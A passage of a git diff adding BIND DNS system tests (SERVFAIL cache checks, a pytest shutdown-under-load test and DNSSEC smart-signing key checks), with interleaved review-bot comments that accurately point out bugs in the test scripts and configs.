a @10.53.0.5 > dig.out.ns5.test$n || ret=1 +grep "SERVFAIL" dig.out.ns5.test$n > /dev/null && ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "switching to non-dnssec SERVFAIL tests" +ret=0 +rndc_with_opts 10.53.0.5 flush 2>&1 | sed 's/^/I:ns5 /' +rndc_dumpdb ns5 -all +mv ns5/named_dump.db.test$n ns5/named_dump.db.test$n.1 +awk '/SERVFAIL/ { next; out=1 } /Zone/ { out=0 } { if (out) print }' ns5/named_dump.db.test$n.1 > sfcache.$n.1 +[ -s "sfcache.$n.1" ] && ret=1 +echo_i "checking SERVFAIL is cached ($n)" +dig_with_opts bar.example2. a @10.53.0.5 > dig.out.ns5.test$n || ret=1 +rndc_dumpdb ns5 -all +mv ns5/named_dump.db.test$n ns5/named_dump.db.test$n.2 +awk '/Zone/{out=0} { if (out) print } /SERVFAIL/{out=1}' ns5/named_dump.db.test$n.2 > sfcache.$n.2 +grep "^; bar.example2/A" sfcache.$n.2 > /dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking SERVFAIL is returned from cache ($n)" +ret=0 +nextpart ns5/named.run > /dev/null +dig_with_opts bar.example2. a @10.53.0.5 > dig.out.ns5.test$n || ret=1 +grep "SERVFAIL" dig.out.ns5.test$n > /dev/null || ret=1 +nextpart ns5/named.run > ns5/named.run.part$n +grep 'servfail cache hit bar.example2/A (CD=0)' ns5/named.run.part$n > /dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking cache is bypassed with +cd query ($n)" +ret=0 +dig_with_opts +cd bar.example2. a @10.53.0.5 > dig.out.ns5.test$n || ret=1 +grep "SERVFAIL" dig.out.ns5.test$n > /dev/null || ret=1 +nextpart ns5/named.run > ns5/named.run.part$n +grep 'servfail cache hit' ns5/named.run.part$n > /dev/null && ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking cache is used for subsequent +cd query ($n)" +ret=0 +dig_with_opts +dnssec bar.example2. 
a @10.53.0.5 > dig.out.ns5.test$n || ret=1 +grep "SERVFAIL" dig.out.ns5.test$n > /dev/null || ret=1 +nextpart ns5/named.run > ns5/named.run.part$n +grep 'servfail cache hit bar.example2/A (CD=1)' ns5/named.run.part$n > /dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/shutdown/clean.sh b/bin/tests/system/shutdown/clean.sh new file mode 100644 index 0000000..d958521 --- /dev/null +++ b/bin/tests/system/shutdown/clean.sh @@ -0,0 +1,20 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns*/*.jnl +rm -f ns*/named.lock +rm -f ns*/named.memstats +rm -f ns*/rpz*.txt +rm -f */named.conf +rm -f */named.run +rm -rf __pycache__ diff --git a/bin/tests/system/shutdown/ns1/named.conf.in b/bin/tests/system/shutdown/ns1/named.conf.in new file mode 100644 index 0000000..dc20259 --- /dev/null +++ b/bin/tests/system/shutdown/ns1/named.conf.in 
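Review bot: In bin/tests/system/sfcache/tests.sh, under "switching to non-dnssec SERVFAIL tests", the program `awk '/SERVFAIL/ { next; out=1 } /Zone/ { out=0 } { if (out) print }'` can never print anything, because `next` ends the action before `out=1` is reached. `sfcache.$n.1` is therefore always empty, and `[ -s "sfcache.$n.1" ] && ret=1` cannot detect a flush that left SERVFAIL entries behind. Reusing the extraction the other checks use and asserting that the earlier entry is gone would make the check effective, e.g. `awk '/Zone/{out=0} { if (out) print } /SERVFAIL/{out=1}' ns5/named_dump.db.test$n.1 > sfcache.$n.1` followed by `grep "^; foo.example/A" sfcache.$n.1 > /dev/null && ret=1`; the dump format is not visible here, so the pattern should be confirmed against a real dump. The flush itself is also unchecked, since the status of `rndc_with_opts 10.53.0.5 flush 2>&1 | sed 's/^/I:ns5 /'` is that of `sed`.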
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ listen-on { 10.53.0.1; };
+ pid-file "named.pid";
+ notify no;
+ dnssec-validation no;
+ allow-query { any; };
+ recursion yes;
+ allow-recursion { any; };
+};
+
+# Delegate .test domain to 10.53.0.2
+zone "." {
+ type master;
+ file "root.db";
+ allow-transfer { none; };
+};
diff --git a/bin/tests/system/shutdown/ns1/root.db b/bin/tests/system/shutdown/ns1/root.db
new file mode 100644
index 0000000..60f1b30
--- /dev/null
+++ b/bin/tests/system/shutdown/ns1/root.db
@@ -0,0 +1,25 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA a.root. root.test. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+
+. IN NS a.root.
+a.root. IN A 10.53.0.1
+
+test IN NS ns1.test
+ns1.test IN A 10.53.0.2
diff --git a/bin/tests/system/shutdown/ns2/named.conf.in b/bin/tests/system/shutdown/ns2/named.conf.in
new file mode 100644
index 0000000..4679c1e
--- /dev/null
+++ b/bin/tests/system/shutdown/ns2/named.conf.in
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ listen-on { 10.53.0.2; };
+ pid-file "named.pid";
+ notify no;
+ dnssec-validation no;
+ allow-query { any; };
+};
+
+# 10.53.0.2 is authoritative for .test domain
+zone "test" {
+ type master;
+ file "test.db";
+ allow-transfer { none; };
+};
diff --git a/bin/tests/system/shutdown/ns2/test.db b/bin/tests/system/shutdown/ns2/test.db
new file mode 100644
index 0000000..91c16ec
--- /dev/null
+++ b/bin/tests/system/shutdown/ns2/test.db
@@ -0,0 +1,18 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+
+@ IN SOA ns1 root.test. 2020040101 4h 1h 1w 60
+@ IN NS ns1
+ns1 IN A 10.53.0.2
+@ IN A 10.53.0.2
+www IN A 10.53.0.2
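Review bot: In `shutdown/ns2/named.conf.in` the `controls` statement binds the control channel to 10.53.0.1, while every other address in that file (`query-source`, `notify-source`, `transfer-source`, `listen-on`) is 10.53.0.2, and `ns1/named.conf.in` already declares the same `inet 10.53.0.1 port @CONTROLPORT@`. If both instances are started with the same control port, presumably only one of them can bind it, and an rndc command intended for ns2 would either fail or be answered by ns1. The line looks like a copy from ns1 and should read `inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };`.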
diff --git a/bin/tests/system/shutdown/prereq.sh b/bin/tests/system/shutdown/prereq.sh
new file mode 100755
index 0000000..9f46512
--- /dev/null
+++ b/bin/tests/system/shutdown/prereq.sh
@@ -0,0 +1,38 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+if test -n "$PYTHON"
+then
+ if $PYTHON -c "import pytest" 2> /dev/null
+ then
+ :
+ else
+ echo_i "This test requires the pytest framework." >&2
+ fi
+
+ if $PYTHON -c "import dns" 2> /dev/null
+ then
+ :
+ else
+ echo_i "This test requires the dnspython module." >&2
+ exit 1
+ fi
+else
+ echo_i "This test requires Python, the pytest framework and the dnspython module." >&2
+ exit 1
+fi
+
+exit 0
diff --git a/bin/tests/system/shutdown/resolver/named.conf.in b/bin/tests/system/shutdown/resolver/named.conf.in
new file mode 100644
index 0000000..f8444e3
--- /dev/null
+++ b/bin/tests/system/shutdown/resolver/named.conf.in
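Review bot: In `shutdown/prereq.sh` the pytest branch only prints "This test requires the pytest framework." and falls through, so the script still reaches `exit 0` when pytest cannot be imported. The dnspython branch and the no-Python branch both end with `exit 1`, so the pytest case is the only prerequisite that does not gate the test. Add `exit 1` after the pytest `echo_i` line so that a missing framework is reported as an unmet prerequisite.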
@@ -0,0 +1,47 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+logging {
+ channel basic {
+ file "named.run";
+ severity debug 999;
+ print-time yes;
+ };
+ category default { basic; };
+};
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ listen-on { 10.53.0.3; };
+ pid-file "named.pid";
+ notify no;
+ dnssec-validation no;
+ allow-query { any; };
+ allow-recursion { any; };
+};
+
+zone "." {
+ type hint;
+ file "root.db";
+};
diff --git a/bin/tests/system/shutdown/resolver/root.db b/bin/tests/system/shutdown/resolver/root.db
new file mode 100644
index 0000000..88e0ba8
--- /dev/null
+++ b/bin/tests/system/shutdown/resolver/root.db
@@ -0,0 +1,21 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA a.root. root.root. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. IN NS a.root.
+a.root. IN A 10.53.0.1
diff --git a/bin/tests/system/shutdown/setup.sh b/bin/tests/system/shutdown/setup.sh
new file mode 100644
index 0000000..575abc6
--- /dev/null
+++ b/bin/tests/system/shutdown/setup.sh
@@ -0,0 +1,23 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# touch dnsrps-off to not test with DNSRPS
+
+set -e
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports resolver/named.conf.in resolver/named.conf
diff --git a/bin/tests/system/shutdown/tests_shutdown.py b/bin/tests/system/shutdown/tests_shutdown.py
new file mode 100755
index 0000000..b6083b7
--- /dev/null
+++ b/bin/tests/system/shutdown/tests_shutdown.py
@@ -0,0 +1,209 @@ +#!/usr/bin/python3 + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +from concurrent.futures import ThreadPoolExecutor, as_completed +import os +import random +import signal +import subprocess +from string import ascii_lowercase as letters +import time + +import pytest + +pytest.importorskip("dns") +import dns.exception +import dns.resolver + + +def do_work(named_proc, resolver, rndc_cmd, kill_method, n_workers, n_queries): + """Creates a number of A queries to run in parallel + in order simulate a slightly more realistic test scenario. + + The main idea of this function is to create and send a bunch + of A queries to a target named instance and during this process + a request for shutting down named will be issued. + + In the process of shutting down named, a couple control connections + are created (by launching rndc) to ensure that the crash was fixed. + + if kill_method=="rndc" named will be asked to shutdown by + means of rndc stop. + if kill_method=="sigterm" named will be killed by SIGTERM on + POSIX systems or by TerminateProcess() on Windows systems. + + :param named_proc: named process instance + :type named_proc: subprocess.Popen + + :param resolver: target resolver + :type resolver: dns.resolver.Resolver + + :param rndc_cmd: rndc command with default arguments + :type rndc_cmd: list of strings, e.g. 
["rndc", "-p", "23750"] + + :kill_method: "rndc" or "sigterm" + :type kill_method: str + + :param n_workers: Number of worker threads to create + :type n_workers: int + + :param n_queries: Total number of queries to send + :type n_queries: int + """ + # pylint: disable-msg=too-many-arguments + # pylint: disable-msg=too-many-locals + + # helper function, args must be a list or tuple with arguments to rndc. + def launch_rndc(args): + return subprocess.call(rndc_cmd + args, timeout=10) + + # We're going to execute queries in parallel by means of a thread pool. + # dnspython functions block, so we need to circunvent that. + with ThreadPoolExecutor(n_workers + 1) as executor: + # Helper dict, where keys=Future objects and values are tags used + # to process results later. + futures = {} + + # 50% of work will be A queries. + # 1 work will be rndc stop. + # Remaining work will be rndc status (so we test parallel control + # connections that were crashing named). + shutdown = True + for i in range(n_queries): + if i < (n_queries // 2): + # Half work will be standard A queries. 
+ # Among those we split 50% queries relname='www', + # 50% queries relname=random characters + if random.randrange(2) == 1: + tag = "good" + relname = "www" + else: + tag = "bad" + length = random.randint(4, 10) + relname = "".join( + letters[random.randrange(len(letters))] for i in range(length) + ) + + qname = relname + ".test" + futures[executor.submit(resolver.query, qname, "A")] = tag + elif shutdown: # We attempt to stop named in the middle + shutdown = False + if kill_method == "rndc": + futures[executor.submit(launch_rndc, ["stop"])] = "stop" + else: + futures[executor.submit(named_proc.terminate)] = "kill" + else: + # We attempt to send couple rndc commands while named is + # being shutdown + futures[executor.submit(launch_rndc, ["status"])] = "status" + + ret_code = -1 + for future in as_completed(futures): + try: + result = future.result() + # If tag is "stop", result is an instance of + # subprocess.CompletedProcess, then we check returncode + # attribute to know if rncd stop command finished successfully. + # + # if tag is "kill" then the main function will check if + # named process exited gracefully after SIGTERM signal. 
+ if futures[future] == "stop": + ret_code = result + + except ( + dns.resolver.NXDOMAIN, + dns.resolver.NoNameservers, + dns.exception.Timeout, + ): + pass + + if kill_method == "rndc": + assert ret_code == 0 + + +def wait_for_named_loaded(resolver, retries=10): + for _ in range(retries): + try: + resolver.query("version.bind", "TXT", "CH") + return True + except (dns.resolver.NoNameservers, dns.exception.Timeout): + time.sleep(1) + return False + + +def wait_for_proc_termination(proc, max_timeout=10): + for _ in range(max_timeout): + if proc.poll() is not None: + return True + time.sleep(1) + + proc.send_signal(signal.SIGABRT) + for _ in range(max_timeout): + if proc.poll() is not None: + return True + time.sleep(1) + + return False + + +def test_named_shutdown(named_port, control_port): + # pylint: disable-msg=too-many-locals + cfg_dir = os.path.join(os.getcwd(), "resolver") + assert os.path.isdir(cfg_dir) + + cfg_file = os.path.join(cfg_dir, "named.conf") + assert os.path.isfile(cfg_file) + + named = os.getenv("NAMED") + assert named is not None + + rndc = os.getenv("RNDC") + assert rndc is not None + + systest_dir = os.getenv("SYSTEMTESTTOP") + assert systest_dir is not None + + # rndc configuration resides in $SYSTEMTESTTOP/common/rndc.conf + rndc_cfg = os.path.join(systest_dir, "common", "rndc.conf") + assert os.path.isfile(rndc_cfg) + + # rndc command with default arguments. + rndc_cmd = [rndc, "-c", rndc_cfg, "-p", str(control_port), "-s", "10.53.0.3"] + + # We create a resolver instance that will be used to send queries. + resolver = dns.resolver.Resolver() + resolver.nameservers = ["10.53.0.3"] + resolver.port = named_port + + # We test named shutting down using two methods: + # Method 1: using rndc ctop + # Method 2: killing with SIGTERM + # In both methods named should exit gracefully. 
+ for kill_method in ("rndc", "sigterm"): + named_cmdline = [named, "-c", cfg_file, "-f"] + with subprocess.Popen(named_cmdline, cwd=cfg_dir) as named_proc: + try: + assert named_proc.poll() is None, "named isn't running" + assert wait_for_named_loaded(resolver) + do_work( + named_proc, + resolver, + rndc_cmd, + kill_method, + n_workers=12, + n_queries=16, + ) + assert wait_for_proc_termination(named_proc) + assert named_proc.returncode == 0, "named crashed" + finally: # Ensure named is terminated in case of an exception + named_proc.kill() diff --git a/bin/tests/system/smartsign/child.db b/bin/tests/system/smartsign/child.db new file mode 100644 index 0000000..878df45 --- /dev/null +++ b/bin/tests/system/smartsign/child.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 60 ; 1 minute +child.parent.nil IN SOA ns.child.parent.nil. hostmaster.parent.nil. ( + 1 ; serial + 2000 ; refresh (33 minutes 20 seconds) + 2000 ; retry (33 minutes 20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns.child.parent.nil. +$ORIGIN child.parent.nil. +$TTL 300 ; 5 minutes +ns A 10.53.0.3 diff --git a/bin/tests/system/smartsign/clean.sh b/bin/tests/system/smartsign/clean.sh new file mode 100644 index 0000000..ad975af --- /dev/null +++ b/bin/tests/system/smartsign/clean.sh 
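Review bot: In `shutdown/tests_shutdown.py`, the comment inside `do_work`'s `as_completed` loop says the "stop" result is a `subprocess.CompletedProcess` whose `returncode` attribute is checked, but `launch_rndc` uses `subprocess.call`, which returns the integer exit status, and the code assigns `ret_code = result` directly. Suggested wording: `# If tag is "stop", result is the integer exit status returned by subprocess.call(); 0 means "rndc stop" succeeded.` Separately, `launch_rndc` passes `timeout=10`, so a hung rndc raises `subprocess.TimeoutExpired` out of `future.result()`, which the `except` tuple does not list. Presumably that is meant to fail the test, and a one-line comment such as `# subprocess.TimeoutExpired is deliberately not caught: a hung rndc fails the test` would make the intent explicit.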
@@ -0,0 +1,15 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f K* dsset-* *.signed dnskey.sigs other.sigs dsset.out +rm -f ns*/named.lock diff --git a/bin/tests/system/smartsign/parent.db b/bin/tests/system/smartsign/parent.db new file mode 100644 index 0000000..a5484e3 --- /dev/null +++ b/bin/tests/system/smartsign/parent.db @@ -0,0 +1,31 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +parent.nil IN SOA ns1.parent.nil. hostmaster.parent.nil. ( + 1 ; serial + 2000 ; refresh (33 minutes 20 seconds) + 2000 ; retry (33 minutes 20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns1.parent.nil. + NS ns2.parent.nil. +$ORIGIN parent.nil. +$TTL 3600 ; 1 hour +a A 1.1.1.1 +$TTL 300 ; 5 minutes +ns1 A 10.53.0.1 +ns2 A 10.53.0.2 + +child NS ns.child +ns.child A 10.53.0.3 diff --git a/bin/tests/system/smartsign/tests.sh b/bin/tests/system/smartsign/tests.sh new file mode 100644 index 0000000..ffde69e --- /dev/null +++ b/bin/tests/system/smartsign/tests.sh 
@@ -0,0 +1,368 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 + +pzone=parent.nil +pfile=parent.db + +czone=child.parent.nil +cfile=child.db + +echo_i "generating child's keys" +# active zsk +czsk1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -L 30 $czone) + +# not yet published or active +czsk2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -P none -A none $czone) + +# published but not active +czsk3=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -A none $czone) + +# inactive +czsk4=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -P now-24h -A now-24h -I now $czone) + +# active in 12 hours, inactive 12 hours after that... 
+czsk5=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -P now+12h -A now+12h -I now+24h $czone) + +# explicit successor to czk5 +# (suppressing warning about lack of removal date) +czsk6=$($KEYGEN -q -S $czsk5 -i 6h 2>/dev/null) + +# active ksk +cksk1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk -L 30 $czone) + +# published but not YET active; will be active in 20 seconds +cksk2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk $czone) +# $SETTIME moved after other $KEYGENs + +echo_i "revoking key" +# revoking key changes its ID +cksk3=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk $czone) +cksk4=$($REVOKE $cksk3) + +echo_i "setting up sync key" +cksk5=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk -P now+1mo -A now+1mo -Psync now $czone) + +echo_i "and future sync key" +cksk6=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk -P now+1mo -A now+1mo -Psync now+1mo $czone) + +echo_i "generating parent keys" +pzsk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} $pzone) +pksk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk $pzone) + +echo_i "setting child's activation time" +# using now+30s to fix RT 24561 +$SETTIME -A now+30s $cksk2 > /dev/null + +echo_i "signing child zone" +czoneout=$($SIGNER -Sg -e now+1d -X now+2d -o $czone $cfile) + +echo_i "signing parent zone" +pzoneout=$($SIGNER -Sg -o $pzone $pfile) + +czactive=$(keyfile_to_key_id $czsk1) +czgenerated=$(keyfile_to_key_id $czsk2) +czpublished=$(keyfile_to_key_id $czsk3) +czinactive=$(keyfile_to_key_id $czsk4) +czpredecessor=$(keyfile_to_key_id $czsk5) +czsuccessor=$(keyfile_to_key_id $czsk6) +ckactive=$(keyfile_to_key_id $cksk1) +ckpublished=$(keyfile_to_key_id $cksk2) +ckprerevoke=$(keyfile_to_key_id $cksk3) +ckrevoked=$(keyfile_to_key_id $cksk4) + +pzid=$(keyfile_to_key_id $pzsk) +pkid=$(keyfile_to_key_id $pksk) + +echo_i "checking dnssec-signzone output matches expectations" +ret=0 +echo "$pzoneout" | grep 'KSKs: 1 active, 0 stand-by, 0 revoked' > /dev/null || ret=1 +echo "$pzoneout" | grep 'ZSKs: 1 active, 0 stand-by, 0 revoked' > /dev/null || ret=1 +echo "$czoneout" | 
grep 'KSKs: 1 active, 1 stand-by, 1 revoked' > /dev/null || ret=1 +echo "$czoneout" | grep 'ZSKs: 1 active, 2 stand-by, 0 revoked' > /dev/null || ret=1 +if [ $ret != 0 ]; then + echo_i "parent $pzoneout" + echo_i "child $czoneout" + echo_i "failed"; +fi +status=$((status + ret)) + +echo_i "rechecking dnssec-signzone output with -x" +ret=0 +# use an alternate output file so -x doesn't interfere with later checks +pzoneout=$($SIGNER -Sxg -o $pzone -f ${pfile}2.signed $pfile) +czoneout=$($SIGNER -Sxg -e now+1d -X now+2d -o $czone -f ${cfile}2.signed $cfile) +echo "$pzoneout" | grep 'KSKs: 1 active, 0 stand-by, 0 revoked' > /dev/null || ret=1 +echo "$pzoneout" | grep 'ZSKs: 1 active, 0 present, 0 revoked' > /dev/null || ret=1 +echo "$czoneout" | grep 'KSKs: 1 active, 1 stand-by, 1 revoked' > /dev/null || ret=1 +echo "$czoneout" | grep 'ZSKs: 1 active, 2 present, 0 revoked' > /dev/null || ret=1 +if [ $ret != 0 ]; then + echo_i "parent $pzoneout" + echo_i "child $czoneout" + echo_i "failed"; +fi +status=$((status + ret)) + +echo_i "checking parent zone DNSKEY set" +ret=0 +grep "key id = $pzid" $pfile.signed > /dev/null || { + ret=1 + echo_i "missing expected parent ZSK id = $pzid" +} +grep "key id = $pkid" $pfile.signed > /dev/null || { + ret=1 + echo_i "missing expected parent KSK id = $pkid" +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking parent zone DS records" +ret=0 +awk '$2 == "DS" {print $3}' $pfile.signed > dsset.out +grep -w "$ckactive" dsset.out > /dev/null || ret=1 +grep -w "$ckpublished" dsset.out > /dev/null || ret=1 +# revoked key should not be there, hence the && +grep -w "$ckprerevoke" dsset.out > /dev/null && ret=1 +grep -w "$ckrevoked" dsset.out > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking child zone DNSKEY set" +ret=0 +grep "key id = $ckactive\$" $cfile.signed > /dev/null || { + ret=1 + echo_i "missing expected child KSK id = $ckactive" +} 
+grep "key id = $ckpublished\$" $cfile.signed > /dev/null || { + ret=1 + echo_i "missing expected child prepublished KSK id = $ckpublished" +} +grep "key id = $ckrevoked\$" $cfile.signed > /dev/null || { + ret=1 + echo_i "missing expected child revoked KSK id = $ckrevoked" +} +grep "key id = $czactive\$" $cfile.signed > /dev/null || { + ret=1 + echo_i "missing expected child ZSK id = $czactive" +} +grep "key id = $czpublished\$" $cfile.signed > /dev/null || { + ret=1 + echo_i "missing expected child prepublished ZSK id = $czpublished" +} +grep "key id = $czinactive\$" $cfile.signed > /dev/null || { + ret=1 + echo_i "missing expected child inactive ZSK id = $czinactive" +} +# should not be there, hence the && +grep "key id = $ckprerevoke\$" $cfile.signed > /dev/null && { + ret=1 + echo_i "found unexpected child pre-revoke ZSK id = $ckprerevoke" +} +grep "key id = $czgenerated\$" $cfile.signed > /dev/null && { + ret=1 + echo_i "found unexpected child generated ZSK id = $czgenerated" +} +grep "key id = $czpredecessor\$" $cfile.signed > /dev/null && { + echo_i "found unexpected ZSK predecessor id = $czpredecessor (ignored)" +} +grep "key id = $czsuccessor\$" $cfile.signed > /dev/null && { + echo_i "found unexpected ZSK successor id = $czsuccessor (ignored)" +} +#grep "key id = $czpredecessor\$" $cfile.signed > /dev/null && ret=1 +#grep "key id = $czsuccessor\$" $cfile.signed > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking key TTLs are correct" +ret=0 +grep "${czone}. 30 IN" ${czsk1}.key > /dev/null 2>&1 || ret=1 +grep "${czone}. 30 IN" ${cksk1}.key > /dev/null 2>&1 || ret=1 +grep "${czone}. IN" ${czsk2}.key > /dev/null 2>&1 || ret=1 +$SETTIME -L 45 ${czsk2} > /dev/null +grep "${czone}. 45 IN" ${czsk2}.key > /dev/null 2>&1 || ret=1 +$SETTIME -L 0 ${czsk2} > /dev/null +grep "${czone}. 
